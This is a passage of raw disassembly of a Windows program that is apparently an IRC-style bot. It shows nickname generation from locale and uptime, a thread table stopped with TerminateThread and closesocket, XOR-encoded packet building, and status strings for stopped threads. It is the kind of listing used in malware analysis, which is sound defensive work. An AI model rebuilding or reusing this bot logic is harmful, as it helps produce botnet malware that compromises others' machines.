or dword ptr [ebp-0Ch], 0FFFFFFFFh
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
push offset aDdDhDm ; "%dd %dh %dm"
push 0
call sub_41ADD8
pop ecx
push eax
call sub_41CCE3
mov eax, [ebp-4]
add esp, 14h
cmp eax, ebx
jge short loc_40B086
push eax
push offset a0D ; "0%d"
lea eax, [ebp-18h]
push ebx
push eax
call sub_41C360
add esp, 10h
jmp short loc_40B0AA
; ---------------------------------------------------------------------------
loc_40B086: ; CODE XREF: .text:0040B06F�j
cmp eax, 64h
jge short loc_40B098
lea ecx, [ebp-18h]
push ebx
push ecx
push eax
call sub_42635C
jmp short loc_40B0A7
; ---------------------------------------------------------------------------
loc_40B098: ; CODE XREF: .text:0040B089�j
push offset a99 ; "99"
lea eax, [ebp-18h]
push ebx
push eax
call sub_41C360
loc_40B0A7: ; CODE XREF: .text:0040B096�j
add esp, 0Ch
loc_40B0AA: ; CODE XREF: .text:0040B084�j
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
lea eax, [ebp-24h]
push ebx
push eax
push 7
push 800h
call ds:dword_4270CC ; GetLocaleInfoA
lea eax, [ebp-18h]
push eax
push esi
lea eax, [ebp-24h]
push edi
mov edi, [ebp+8]
push eax
push offset aSSSS_0 ; "%s|%s|%s|%s|"
push 1Ch
push edi
call sub_41C360
xor esi, esi
add esp, 1Ch
cmp dword_429098, esi
jle short loc_40B115
loc_40B0F0: ; CODE XREF: .text:0040B113�j
call sub_41C2C2
cdq
mov ecx, ebx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_41C360
add esp, 14h
inc esi
cmp esi, dword_429098
jl short loc_40B0F0
loc_40B115: ; CODE XREF: .text:0040B0EE�j
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
sub_40B11C proc near ; CODE XREF: sub_40B13C+A�p
; sub_40B214+8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_41B9C0
push [esp+8+arg_4]
mov esi, eax
call sub_41B9C0
pop ecx
lea eax, [esi+eax*2+0C1h]
pop ecx
pop esi
retn
sub_40B11C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B13C proc near ; CODE XREF: sub_40B22B+49�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C]
push [ebp+arg_8]
call sub_40B11C
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_40B159
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40B159: ; CODE XREF: sub_40B13C+17�j
push ebx
push esi
push edi
push [ebp+arg_8]
call sub_41B9C0
push [ebp+arg_C]
mov esi, eax
call sub_41B9C0
mov edi, eax
mov ebx, [ebp+arg_0]
push 0FFFFFFEDh
lea eax, [edi+esi+12h]
mov dword_43171C, eax
lea eax, [edi+1]
mov dword_43173D, eax
lea eax, [edi+17h]
mov dword_431735, eax
pop eax
push 74h
sub eax, edi
push offset dword_4316B8
push ebx
mov dword_43174B, eax
call sub_41CD20
push esi
lea eax, [ebx+74h]
push [ebp+arg_8]
push eax
call sub_41CD20
add esi, 74h
push 5
push offset aGet ; " get "
lea eax, [esi+ebx]
push eax
call sub_41CD20
add esi, 5
push edi
push [ebp+arg_C]
lea eax, [esi+ebx]
push eax
call sub_41CD20
add esi, edi
push 10h
push 431731h
lea eax, [esi+ebx]
push eax
call sub_41CD20
add esp, 44h
add esi, 10h
push edi
lea eax, [esi+ebx]
push [ebp+arg_C]
push eax
call sub_41CD20
add esi, edi
push 38h
add esi, ebx
push offset byte_431741
push esi
call sub_41CD20
mov eax, [ebp+var_4]
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_40B13C endp
; =============== S U B R O U T I N E =======================================
sub_40B214 proc near ; CODE XREF: sub_40B22B+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_40B11C
push eax
call sub_40B298
add esp, 0Ch
retn
sub_40B214 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B22B proc near ; CODE XREF: sub_40DCF9+32�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
push edi
mov edi, [ebp+arg_C]
push edi
push ebx
call sub_40B214
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
ja short loc_40B24B
cmp eax, 0FFFFh
jbe short loc_40B24F
loc_40B24B: ; CODE XREF: sub_40B22B+17�j
xor eax, eax
jmp short loc_40B294
; ---------------------------------------------------------------------------
loc_40B24F: ; CODE XREF: sub_40B22B+1E�j
push esi
push edi
push ebx
call sub_40B11C
add eax, 101h
push eax
call sub_41BEB5
add esp, 0Ch
mov esi, eax
push edi
push ebx
push edi
push ebx
call sub_40B11C
pop ecx
pop ecx
push eax
push esi
call sub_40B13C
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40B2B3
push esi
mov edi, eax
call sub_41BA91
add esp, 24h
mov eax, edi
pop esi
loc_40B294: ; CODE XREF: sub_40B22B+22�j
pop edi
pop ebx
pop ebp
retn
sub_40B22B endp
; =============== S U B R O U T I N E =======================================
sub_40B298 proc near ; CODE XREF: sub_40B214+E�p
; sub_40B2B3+4A�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_40B2A1
inc ecx
loc_40B2A1: ; CODE XREF: sub_40B298+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_40B298 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B2B3 proc near ; CODE XREF: sub_40B22B+56�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_C], 0Ah
jz short loc_40B2CF
cmp byte ptr [ebp+arg_C], 0Dh
jz short loc_40B2CF
cmp byte ptr [ebp+arg_C], 5Ch
jz short loc_40B2CF
cmp byte ptr [ebp+arg_C], 0
jnz short loc_40B2D2
loc_40B2CF: ; CODE XREF: sub_40B2B3+8�j
; sub_40B2B3+E�j ...
inc [ebp+arg_C]
loc_40B2D2: ; CODE XREF: sub_40B2B3+1A�j
push esi
mov esi, 0FFh
cmp [ebp+arg_C], esi
jbe short loc_40B2FA
mov eax, [ebp+arg_C]
shr eax, 8
cmp al, 0Ah
jz short loc_40B2F3
cmp al, 0Dh
jz short loc_40B2F3
cmp al, 5Ch
jz short loc_40B2F3
test al, al
jnz short loc_40B2FA
loc_40B2F3: ; CODE XREF: sub_40B2B3+32�j
; sub_40B2B3+36�j ...
add [ebp+arg_C], 100h
loc_40B2FA: ; CODE XREF: sub_40B2B3+28�j
; sub_40B2B3+3E�j
push [ebp+arg_C]
call sub_40B298
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+var_4], eax
ja short loc_40B312
cmp eax, 0FFFFh
jbe short loc_40B319
loc_40B312: ; CODE XREF: sub_40B2B3+56�j
xor eax, eax
jmp loc_40B3B7
; ---------------------------------------------------------------------------
loc_40B319: ; CODE XREF: sub_40B2B3+5D�j
mov ecx, [ebp+arg_C]
push ebx
mov bl, byte_4CBB18
xor edx, edx
push edi
mov edi, [ebp+arg_8]
test ecx, ecx
jbe short loc_40B349
loc_40B32D: ; CODE XREF: sub_40B2B3+94�j
mov al, [edx+edi]
xor al, bl
jz short loc_40B340
cmp al, 0Ah
jz short loc_40B340
cmp al, 0Dh
jz short loc_40B340
cmp al, 5Ch
jnz short loc_40B344
loc_40B340: ; CODE XREF: sub_40B2B3+7F�j
; sub_40B2B3+83�j ...
inc bl
xor edx, edx
loc_40B344: ; CODE XREF: sub_40B2B3+8B�j
inc edx
cmp edx, ecx
jb short loc_40B32D
loc_40B349: ; CODE XREF: sub_40B2B3+78�j
cmp ecx, esi
mov byte_4CBB18, bl
ja short loc_40B375
push 15h
push offset dword_4316A0
push [ebp+arg_0]
mov byte_4316AD, cl
mov byte_4316B1, bl
call sub_41CD20
add esp, 0Ch
push 15h
jmp short loc_40B396
; ---------------------------------------------------------------------------
loc_40B375: ; CODE XREF: sub_40B2B3+9E�j
push 17h
push offset dword_431688
push [ebp+arg_0]
mov word_431696, cx
mov byte_43169B, bl
call sub_41CD20
add esp, 0Ch
push 17h
loc_40B396: ; CODE XREF: sub_40B2B3+C0�j
xor eax, eax
pop ecx
cmp [ebp+arg_C], eax
jbe short loc_40B3B2
mov edx, [ebp+arg_0]
lea esi, [ecx+edx]
loc_40B3A4: ; CODE XREF: sub_40B2B3+FD�j
mov cl, [eax+edi]
xor cl, bl
mov [esi+eax], cl
inc eax
cmp eax, [ebp+arg_C]
jb short loc_40B3A4
loc_40B3B2: ; CODE XREF: sub_40B2B3+E9�j
mov eax, [ebp+var_4]
pop edi
pop ebx
loc_40B3B7: ; CODE XREF: sub_40B2B3+61�j
pop esi
leave
retn
sub_40B2B3 endp
; =============== S U B R O U T I N E =======================================
sub_40B3BA proc near ; CODE XREF: sub_401221+378�p
; sub_401221+3B7�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_43E710
loc_40B3C2: ; CODE XREF: sub_40B3BA+18�j
cmp byte ptr [eax], 0
jz short loc_40B3D6
add eax, 234h
inc edi
cmp eax, offset dword_4CB710
jl short loc_40B3C2
jmp short loc_40B421
; ---------------------------------------------------------------------------
loc_40B3D6: ; CODE XREF: sub_40B3BA+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_43E710[esi]
push eax
call sub_41BFD0
mov eax, [esp+14h+arg_4]
add esp, 0Ch
mov dword_43E910[esi], eax
and dword_43E914[esi], 0
mov eax, [esp+8+arg_8]
and dword_43E918[esi], 0
mov dword_43E91C[esi], eax
and byte_43E928[esi], 0
pop esi
loc_40B421: ; CODE XREF: sub_40B3BA+1A�j
mov eax, edi
pop edi
retn
sub_40B3BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B425 proc near ; DATA XREF: sub_401ACD+2946�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
push [ebp+var_10]
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
call sub_40B477
push [ebp+var_14]
call sub_40B6D6
add esp, 14h
push 0
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_40B425 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B477 proc near ; CODE XREF: sub_40B425+38�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset dword_43177C
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 14h
xor edi, edi
mov esi, offset dword_43E710
loc_40B4A1: ; CODE XREF: sub_40B477+78�j
cmp byte ptr [esi], 0
jz short loc_40B4E2
cmp [ebp+arg_C], 0
jnz short loc_40B4B5
cmp dword ptr [esi+204h], 0
jnz short loc_40B4E2
loc_40B4B5: ; CODE XREF: sub_40B477+33�j
push esi
push edi
lea eax, [ebp+var_200]
push offset aD_S ; "%d. %s"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 24h
loc_40B4E2: ; CODE XREF: sub_40B477+2D�j
; sub_40B477+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_4CB710
jl short loc_40B4A1
pop edi
pop esi
leave
retn
sub_40B477 endp
; =============== S U B R O U T I N E =======================================
sub_40B4F5 proc near ; CODE XREF: sub_401ACD+79AA�p
; sub_40B583+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_40B57D
cmp esi, 400h
jge short loc_40B57D
imul esi, 234h
push edi
push ebx
push dword_43E924[esi]
lea edi, dword_43E924[esi]
call ds:dword_4270B4 ; TerminateThread
cmp [edi], ebx
jz short loc_40B52D
push 1
pop ebp
loc_40B52D: ; CODE XREF: sub_40B4F5+33�j
mov [edi], ebx
lea edi, dword_43E918[esi]
mov dword_43E910[esi], ebx
mov dword_43E914[esi], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_40B54E
push eax
call sub_419F16
pop ecx
loc_40B54E: ; CODE XREF: sub_40B4F5+50�j
mov [edi], ebx
lea edi, dword_43E91C[esi]
mov byte ptr dword_43E710[esi], bl
mov byte_43E928[esi], bl
push dword ptr [edi]
call dword_4CBA6C ; closesocket
lea esi, dword_43E920[esi]
mov [edi], ebx
push dword ptr [esi]
call dword_4CBA6C ; closesocket
mov [esi], ebx
pop edi
loc_40B57D: ; CODE XREF: sub_40B4F5+D�j
; sub_40B4F5+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_40B4F5 endp
; =============== S U B R O U T I N E =======================================
sub_40B583 proc near ; CODE XREF: sub_40111D+18�p
; sub_401221:loc_4017D9�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_43E710
loc_40B58F: ; CODE XREF: sub_40B583+2A�j
cmp byte ptr [esi], 0
jz short loc_40B5A0
push edi
call sub_40B4F5
test eax, eax
pop ecx
jz short loc_40B5A0
inc ebx
loc_40B5A0: ; CODE XREF: sub_40B583+F�j
; sub_40B583+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_4CB710
jl short loc_40B58F
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_40B583 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B5B5 proc near ; CODE XREF: sub_401ACD+41B2�p
; sub_401ACD+4302�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_43E914
loc_40B5C9: ; CODE XREF: sub_40B5B5+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_40B5EB
test edi, edi
jle short loc_40B5DD
cmp [esi], edi
jz short loc_40B5DD
cmp ebx, edi
jnz short loc_40B5EB
loc_40B5DD: ; CODE XREF: sub_40B5B5+1E�j
; sub_40B5B5+22�j
push ebx
call sub_40B4F5
test eax, eax
pop ecx
jz short loc_40B5EB
inc [ebp+var_4]
loc_40B5EB: ; CODE XREF: sub_40B5B5+1A�j
; sub_40B5B5+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_4CB914
jl short loc_40B5C9
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_40B5B5 endp
; =============== S U B R O U T I N E =======================================
sub_40B602 proc near ; CODE XREF: sub_401221+40F�p
; sub_401ACD:loc_40242B�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_43E910
loc_40B609: ; CODE XREF: sub_40B602+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_40B612
inc eax
loc_40B612: ; CODE XREF: sub_40B602+D�j
add ecx, 234h
cmp ecx, offset dword_4CB910
jl short loc_40B609
retn
sub_40B602 endp
; =============== S U B R O U T I N E =======================================
sub_40B621 proc near ; CODE XREF: sub_401ACD+23D9�p
arg_0 = dword ptr 4
xor eax, eax
push esi
xor edx, edx
mov ecx, offset dword_43E910
loc_40B62B: ; CODE XREF: sub_40B621+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_40B644
add ecx, 234h
inc edx
cmp ecx, offset dword_4CB910
jl short loc_40B62B
pop esi
retn
; ---------------------------------------------------------------------------
loc_40B644: ; CODE XREF: sub_40B621+10�j
mov eax, edx
pop esi
retn
sub_40B621 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B648 proc near ; CODE XREF: sub_401ACD+123D�p
; sub_401ACD+125B�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_40B661
push [ebp+arg_1C]
call sub_41C159
pop ecx
loc_40B661: ; CODE XREF: sub_40B648+E�j
push eax
push [ebp+arg_18]
call sub_40B5B5
pop ecx
test eax, eax
pop ecx
jle short loc_40B68D
push eax
lea eax, [ebp+var_200]
push [ebp+arg_14]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s %s stopped. (%d thread(s) stopped.)"
push eax
call sub_41C266
add esp, 14h
jmp short loc_40B6A7
; ---------------------------------------------------------------------------
loc_40B68D: ; CODE XREF: sub_40B648+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s No %s thread found."
push eax
call sub_41C266
add esp, 10h
loc_40B6A7: ; CODE XREF: sub_40B648+43�j
cmp [ebp+arg_C], 0
jnz short loc_40B6C7
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 14h
loc_40B6C7: ; CODE XREF: sub_40B648+63�j
lea eax, [ebp+var_200]
push eax
call sub_415D38
pop ecx
leave
retn
sub_40B648 endp
; =============== S U B R O U T I N E =======================================
sub_40B6D6 proc near ; CODE XREF: sub_4017ED+159�p
; sub_40B425+40�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 234h
mov dword_43E924[eax], ecx
mov dword_43E910[eax], ecx
mov dword_43E914[eax], ecx
mov dword_43E918[eax], ecx
mov dword_43E91C[eax], ecx
mov dword_43E920[eax], ecx
mov byte ptr dword_43E710[eax], cl
mov byte_43E928[eax], cl
retn
sub_40B6D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B713 proc near ; CODE XREF: sub_401ACD+7C2B�p
; sub_40B841+6B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push 1
pop eax
loc_40B71D: ; CODE XREF: sub_40B713+68�j
mov cl, [esi]
test cl, cl
jz short loc_40B77D
cmp eax, 1
jnz short loc_40B77D
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_40B77D
cmp cl, 2Ah
jz short loc_40B764
cmp cl, 3Fh
jz short loc_40B747
cmp cl, 5Bh
jz short loc_40B74C
xor eax, eax
cmp cl, dl
setz al
loc_40B747: ; CODE XREF: sub_40B713+26�j
inc [ebp+arg_4]
jmp short loc_40B777
; ---------------------------------------------------------------------------
loc_40B74C: ; CODE XREF: sub_40B713+2B�j
lea eax, [ebp+arg_4]
inc esi
push eax
lea eax, [ebp+arg_0]
push eax
mov [ebp+arg_0], esi
call sub_40B7A9
mov esi, [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_40B777
; ---------------------------------------------------------------------------
loc_40B764: ; CODE XREF: sub_40B713+21�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_40B841
mov esi, [ebp+arg_0]
pop ecx
pop ecx
dec esi
loc_40B777: ; CODE XREF: sub_40B713+37�j
; sub_40B713+4F�j
inc esi
mov [ebp+arg_0], esi
jmp short loc_40B71D
; ---------------------------------------------------------------------------
loc_40B77D: ; CODE XREF: sub_40B713+E�j
; sub_40B713+13�j ...
cmp byte ptr [esi], 2Ah
jnz short loc_40B78D
cmp eax, 1
jnz short loc_40B7A4
inc esi
mov [ebp+arg_0], esi
jmp short loc_40B77D
; ---------------------------------------------------------------------------
loc_40B78D: ; CODE XREF: sub_40B713+6D�j
cmp eax, 1
jnz short loc_40B7A4
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_40B7A4
cmp byte ptr [esi], 0
jnz short loc_40B7A4
push 1
pop eax
jmp short loc_40B7A6
; ---------------------------------------------------------------------------
loc_40B7A4: ; CODE XREF: sub_40B713+72�j
; sub_40B713+7D�j ...
xor eax, eax
loc_40B7A6: ; CODE XREF: sub_40B713+8F�j
pop esi
pop ebp
retn
sub_40B713 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B7A9 proc near ; CODE XREF: sub_40B713+45�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
push edi
xor edi, edi
push 1
mov ecx, [edx]
and [ebp+var_8], edi
pop eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_40B7CA
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_40B7CA: ; CODE XREF: sub_40B7A9+19�j
push ebx
push esi
loc_40B7CC: ; CODE XREF: sub_40B7A9+7B�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_40B7DA
cmp [ebp+var_4], eax
jnz short loc_40B826
loc_40B7DA: ; CODE XREF: sub_40B7A9+2A�j
test edi, edi
jnz short loc_40B81B
cmp bl, 2Dh
jnz short loc_40B80F
mov al, [ecx+1]
lea esi, [ecx+1]
mov cl, [ecx-1]
cmp cl, al
jge short loc_40B80F
cmp al, 5Dh
jz short loc_40B80F
cmp [ebp+var_4], edi
jnz short loc_40B80F
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_40B81B
cmp bl, al
jg short loc_40B81B
push 1
mov [edx], esi
pop edi
jmp short loc_40B81B
; ---------------------------------------------------------------------------
loc_40B80F: ; CODE XREF: sub_40B7A9+38�j
; sub_40B7A9+45�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_40B81B
push 1
pop edi
loc_40B81B: ; CODE XREF: sub_40B7A9+33�j
; sub_40B7A9+59�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
push 1
pop eax
jmp short loc_40B7CC
; ---------------------------------------------------------------------------
loc_40B826: ; CODE XREF: sub_40B7A9+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_40B833
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_40B833: ; CODE XREF: sub_40B7A9+82�j
cmp edi, eax
jnz short loc_40B83C
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_40B83C: ; CODE XREF: sub_40B7A9+8C�j
mov eax, edi
pop edi
leave
retn
sub_40B7A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B841 proc near ; CODE XREF: sub_40B713+59�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
xor ebx, ebx
loc_40B85D: ; CODE XREF: sub_40B841+3A�j
cmp [eax], bl
jz short loc_40B87D
mov cl, [ecx]
cmp cl, 3Fh
jz short loc_40B872
cmp cl, 2Ah
jnz short loc_40B87D
cmp cl, 3Fh
jnz short loc_40B875
loc_40B872: ; CODE XREF: sub_40B841+25�j
inc eax
mov [edi], eax
loc_40B875: ; CODE XREF: sub_40B841+2F�j
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
jmp short loc_40B85D
; ---------------------------------------------------------------------------
loc_40B87D: ; CODE XREF: sub_40B841+1E�j
; sub_40B841+2A�j ...
mov eax, [esi]
cmp byte ptr [eax], 2Ah
jnz short loc_40B888
inc dword ptr [esi]
jmp short loc_40B87D
; ---------------------------------------------------------------------------
loc_40B888: ; CODE XREF: sub_40B841+41�j
mov eax, [edi]
mov cl, [eax]
cmp cl, bl
jnz short loc_40B8A9
mov edx, [esi]
cmp [edx], bl
jz short loc_40B89A
xor eax, eax
jmp short loc_40B909
; ---------------------------------------------------------------------------
loc_40B89A: ; CODE XREF: sub_40B841+53�j
cmp cl, bl
jnz short loc_40B8A9
mov ecx, [esi]
cmp [ecx], bl
jnz short loc_40B8A9
push 1
pop eax
jmp short loc_40B909
; ---------------------------------------------------------------------------
loc_40B8A9: ; CODE XREF: sub_40B841+4D�j
; sub_40B841+5B�j ...
push eax
push dword ptr [esi]
call sub_40B713
pop ecx
test eax, eax
pop ecx
jnz short loc_40B8F3
loc_40B8B7: ; CODE XREF: sub_40B841+B0�j
inc dword ptr [edi]
mov eax, [edi]
loc_40B8BB: ; CODE XREF: sub_40B841+90�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jz short loc_40B8D3
cmp cl, 5Bh
jz short loc_40B8D3
cmp dl, bl
jz short loc_40B8D3
inc eax
mov [edi], eax
jmp short loc_40B8BB
; ---------------------------------------------------------------------------
loc_40B8D3: ; CODE XREF: sub_40B841+82�j
; sub_40B841+87�j ...
mov eax, [edi]
cmp [eax], bl
jz short loc_40B8EA
push eax
push dword ptr [esi]
call sub_40B713
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40B8EF
; ---------------------------------------------------------------------------
loc_40B8EA: ; CODE XREF: sub_40B841+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_40B8EF: ; CODE XREF: sub_40B841+A7�j
cmp eax, ebx
jnz short loc_40B8B7
loc_40B8F3: ; CODE XREF: sub_40B841+74�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_40B906
mov eax, [esi]
cmp [eax], bl
jnz short loc_40B906
mov [ebp+var_4], 1
loc_40B906: ; CODE XREF: sub_40B841+B6�j
; sub_40B841+BC�j
mov eax, [ebp+var_4]
loc_40B909: ; CODE XREF: sub_40B841+57�j
; sub_40B841+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_40B841 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B90E proc near ; CODE XREF: sub_401ACD+2AB2�p
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset unk_431B94
push eax
xor ebx, ebx
call sub_41C266
cmp dword_4317F8, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40B980
push esi
mov esi, offset dword_431800
loc_40B941: ; CODE XREF: sub_40B90E+6F�j
mov eax, [esi]
test eax, eax
jbe short loc_40B976
add ebx, eax
push eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset dword_431B88
push eax
call sub_41C266
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_41CBC0
add esp, 1Ch
loc_40B976: ; CODE XREF: sub_40B90E+37�j
add esi, 40h
cmp dword ptr [esi-8], 0
jnz short loc_40B941
pop esi
loc_40B980: ; CODE XREF: sub_40B90E+2B�j
push dword_4CB714
call sub_41ADD8
pop ecx
push eax
push ebx
lea eax, [ebp+var_400]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_41C266
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_41CBC0
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
lea eax, [ebp+var_200]
push eax
call sub_415D38
add esp, 34h
pop edi
pop ebx
leave
retn
sub_40B90E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B9DD proc near ; CODE XREF: sub_401ACD+2A9C�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
mov eax, dword_4CE4E0
mov ecx, dword_4CE4DC
push esi
push dword_4CB714
lea esi, [ecx+eax]
call sub_41ADD8
pop ecx
push eax
push esi
push dword_4CE4E0
lea eax, [ebp+var_200]
push dword_4CE4DC
push offset unk_431BB4
push eax
call sub_41C266
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
lea eax, [ebp+var_200]
push eax
call sub_415D38
add esp, 30h
pop esi
leave
retn
sub_40B9DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BA49 proc near ; CODE XREF: sub_401ACD+2A86�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
